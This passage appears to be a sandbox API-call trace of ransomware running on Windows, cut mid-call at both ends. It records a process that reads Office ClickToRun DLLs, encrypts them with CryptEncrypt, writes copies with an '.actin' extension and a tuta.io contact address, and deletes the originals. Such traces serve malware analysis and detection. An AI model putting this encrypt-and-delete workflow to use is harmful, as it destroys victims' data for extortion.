hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0142.999] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0143.328] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0143.328] ReadFile (in: hFile=0x2d8, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0143.334] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0143.334] ReadFile (in: hFile=0x2d8, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0143.342] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac3130) returned 1 [0143.342] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0143.342] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0070) returned 1 [0143.343] CryptDestroyKey (hKey=0xac3130) returned 1 [0143.343] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0143.344] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef708*=0xc0122, lpOverlapped=0x0) returned 1 [0143.614] SetEndOfFile (hFile=0x2d8) returned 1 [0143.614] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0143.614] WriteFile (in: hFile=0x2d8, lpBuffer=0x385115a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385115a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.616] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0143.616] WriteFile (in: hFile=0x2d8, lpBuffer=0x385115a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385115a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.618] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0143.618] WriteFile (in: hFile=0x2d8, lpBuffer=0x385115a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385115a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.620] CloseHandle (hObject=0x2d8) returned 1 [0143.966] SetEvent (hEvent=0x288) returned 1 [0144.274] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0144.274] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=567512) returned 1 [0144.274] CloseHandle (hObject=0x2d8) returned 1 [0144.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll")) returned 0x20 [0144.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.275] SetEvent (hEvent=0x288) returned 1 [0144.276] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0144.276] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1231576) returned 1 [0144.276] CloseHandle (hObject=0x300) returned 1 [0144.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll")) returned 0x20 [0144.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.276] SetEvent (hEvent=0x288) returned 1 [0144.277] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0144.277] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=947928) returned 1 [0144.277] CloseHandle (hObject=0x300) returned 1 [0144.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll")) returned 0x20 [0144.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.277] SetEvent (hEvent=0x288) returned 1 [0144.278] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0144.278] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1295576) returned 1 [0144.278] CloseHandle (hObject=0x300) returned 1 [0144.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll")) returned 0x20 [0144.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.278] SetEvent (hEvent=0x288) returned 1 [0144.278] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0144.279] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=512216) returned 1 [0144.280] CloseHandle (hObject=0x300) returned 1 [0144.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 0x20 [0144.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0144.280] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0144.280] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0144.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0144.281] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d30) returned 1 [0144.281] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0144.281] ReadFile (in: hFile=0x300, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x7d0d8, lpOverlapped=0x0) returned 1 [0144.292] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7d0e0, dwBufLen=0x7d0e0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7d0e0) returned 1 [0144.293] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x7d0e0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x7d0e0, lpOverlapped=0x0) returned 1 [0144.302] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0144.302] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0144.302] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0144.302] CryptDestroyKey (hKey=0xac2f30) returned 1 [0144.302] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0144.302] CryptDestroyKey (hKey=0xac2d30) returned 1 [0144.302] CloseHandle (hObject=0x300) returned 1 [0144.303] CloseHandle (hObject=0x304) returned 1 [0144.616] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 1 [0144.856] SetEvent (hEvent=0x288) returned 1 [0144.856] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0144.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0144.857] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1208928) returned 1 [0144.857] CloseHandle (hObject=0x304) returned 1 [0144.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")) returned 0x20 [0144.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0144.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0144.857] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0144.857] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0144.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0144.858] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32b0) returned 1 [0144.858] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0144.858] ReadFile (in: hFile=0x304, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x110100, lpOverlapped=0x0) returned 1 [0144.876] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x110100) returned 1 [0144.877] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x110100, lpOverlapped=0x0) returned 1 [0145.185] ReadFile (in: hFile=0x304, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x17160, lpOverlapped=0x0) returned 1 [0145.185] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17170, dwBufLen=0x17170 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17170) returned 1 [0145.186] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x17170, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x17170, lpOverlapped=0x0) returned 1 [0145.187] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2db0) returned 1 [0145.187] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.187] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0145.187] CryptDestroyKey (hKey=0xac2db0) returned 1 [0145.187] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0145.187] CryptDestroyKey (hKey=0xac32b0) returned 1 [0145.187] CloseHandle (hObject=0x304) returned 1 [0145.188] CloseHandle (hObject=0x2f4) returned 1 [0145.188] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")) returned 1 [0145.190] SetEvent (hEvent=0x288) returned 1 [0145.190] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0145.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0145.191] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=902328) returned 1 [0145.191] CloseHandle (hObject=0x2f4) returned 1 [0145.191] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll")) returned 0x20 [0145.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0145.192] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.192] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0145.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0145.192] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32b0) returned 1 [0145.192] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.192] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xdc4b8, lpOverlapped=0x0) returned 1 [0145.209] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xdc4c0, dwBufLen=0xdc4c0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xdc4c0) returned 1 [0145.211] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xdc4c0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xdc4c0, lpOverlapped=0x0) returned 1 [0145.226] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac31f0) returned 1 [0145.226] CryptSetKeyParam (hKey=0xac31f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0145.226] CryptEncrypt (in: hKey=0xac31f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0145.226] CryptDestroyKey (hKey=0xac31f0) returned 1 [0145.226] WriteFile (in: hFile=0x304, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0145.226] CryptDestroyKey (hKey=0xac32b0) returned 1 [0145.226] CloseHandle (hObject=0x2f4) returned 1 [0145.227] CloseHandle (hObject=0x304) returned 1 [0145.227] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll")) returned 1 [0145.398] SetEvent (hEvent=0x288) returned 1 [0145.398] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0145.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0145.399] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=332968) returned 1 [0145.400] CloseHandle (hObject=0x2f8) returned 1 [0145.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll")) returned 0x20 [0145.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 